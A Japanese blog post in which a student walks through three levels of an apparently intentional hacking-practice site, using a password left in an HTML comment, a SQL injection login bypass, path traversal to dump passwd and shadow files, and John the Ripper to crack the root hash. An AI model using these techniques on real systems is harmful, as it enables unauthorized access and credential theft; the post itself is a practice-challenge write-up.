家にいても暇だからハッキング検定を受けてみました!!中3でw

http://hackme.netfire.jp/star←にハッキング検定できるからやってみ!

まずレベル1だが右クリックなど全て不正行為は不可能!

ソースコードと言うものをだしてきて

ソースコードを見ると63行目に
<!-- id: admin -->
<!-- pass: nimdadmin -->
と書いてあるのが分かるよって     ID:adminPASS:nimdadmin 

それを入力するとレベル1をクリアーできる 

次にレベル2 IDはLV1よりadminとなるのが分かる。

ここで注目すべきは「’」(シングルクォート)を入力した時のエラーでござる!Warning: pg_query() [function.pg-query]:
Query failed: ERROR: syntax error at or near "'"
と出てくるのが分かる。
よって何年か前に流行ったSQLインジェクションの可能性が高まったので
その脆弱性を利用してパスワードは「' or 1=1 --」と判明

よってID:admin
    PASS:' or 1=1 --
     または適当に' or 2=2 --でもできる これでレベル2は
クリアー^-^

次はレベル3 ここからはハッキングの達人だねw

ここではjohn the ripperというMD5の暗号化ソフトが必要なる。

注目すべきはURLの
http://hackme.netfire.jp/Lv3/login?page=template/login.html
の=以下を変更して../etc/passwdに変更…
http://hackme.netfire.jp/Lv3/login?page=../etc/passwd
でアクセスすると
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:101:106::/var/run/dbus:/bin/false
clamav:x:100:108::/var/lib/clamav:/bin/false
avahi:x:103:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:105:117::/home/saned:/bin/false
postgres:x:104:114:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ftp:x:109:65534::/home/ftp:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/falseと出てくる
http://hackme.netfire.jp/Lv3/login?page=../etc/master.passwd
でshadowファイルを表示させることだ。
すると
root:$1$XrYEYZFS$SHOdsbIxyK2wJ1sq7lC4b1:15029:0:99999:7:::
daemon:*:13554:0:99999:7:::
bin:*:13554:0:99999:7:::
sys:*:13554:0:99999:7:::
sync:*:13554:0:99999:7:::
games:*:13554:0:99999:7:::
man:*:13554:0:99999:7:::
lp:*:13554:0:99999:7:::
mail:*:13554:0:99999:7:::
news:*:13554:0:99999:7:::
uucp:*:13554:0:99999:7:::
proxy:*:13554:0:99999:7:::
www-data:*:13554:0:99999:7:::
backup:*:13554:0:99999:7:::
list:*:13554:0:99999:7:::
irc:*:13554:0:99999:7:::
gnats:*:13554:0:99999:7:::
nobody:*:13554:0:99999:7:::
messagebus:!:13554:0:99999:7:::
clamav:!:13824:0:99999:7:::
avahi:*:14268:0:99999:7:::
saned:*:14268:0:99999:7:::
postgres:*:14506:0:99999:7:::
ftp:*:14546:0:99999:7:::
haldaemon:*:14664:0:99999:7:::
というshadowファイルの表示に成功する
それぞれの表示させた暗号をpasswdとshadowというファイル名で
john the ripperrunというファイル下に保存してください。(拡張子なしで)
これらを結合してひとつのファイルとするためにここでjohn the ripperを利用する
方法はまずコマンドプロンプトを起動する
起動方法はウィンドウズのロゴキーと「R」を同時押しで出てきたウィンドウにCMDと打つ
コマンドプロンプトのcdコマンドでデスクトップにあるrunまで移動する
C:\Users\ユーザー名>cd Desktop\john171w\john1701\run
次は
unshadow passwd shadow >passfile
で2つのファイルを結合してpassfileという1つのファイルにする。
後は
john-mmx passfile
とコマンドプロンプトに打ち込み暗号の解析
(辞書アタックで解析)
さすがに--singleではダメでしたね。そのまま解析が結果として一番無難。

解析結果は
Loaded 1 password hash (FreeBSD MD5 [32/32])
m1911a1          (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 5390  trying: m1911a1

よって     ID:root
       PASS:m1911a1

これでレベル3を突破!

レベル4からは全然わかりませんw